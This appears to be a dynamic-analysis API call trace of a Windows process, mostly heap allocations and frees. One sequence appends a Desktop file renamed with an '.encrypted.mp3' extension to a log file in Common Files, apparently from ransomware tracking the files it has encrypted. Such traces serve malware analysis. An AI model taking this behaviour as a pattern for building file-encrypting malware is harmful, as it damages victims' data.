[0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.173] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0030.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.174] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0030.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.176] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.176] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.176] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.176] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.176] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.176] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.176] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x2ed, lpOverlapped=0x0) returned 1 [0030.176] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.176] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.176] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.encrypted.mp3\r\n", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0030.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.encrypted.mp3\r\n", cchWideChar=64, lpMultiByteStr=0x7ab338, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 64 [0030.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.177] WriteFile (in: hFile=0x140, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x3f, lpOverlapped=0x0) returned 1 [0030.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.177] CloseHandle (hObject=0x140) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.178] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.178] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.180] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.180] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.180] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.180] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.180] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.181] 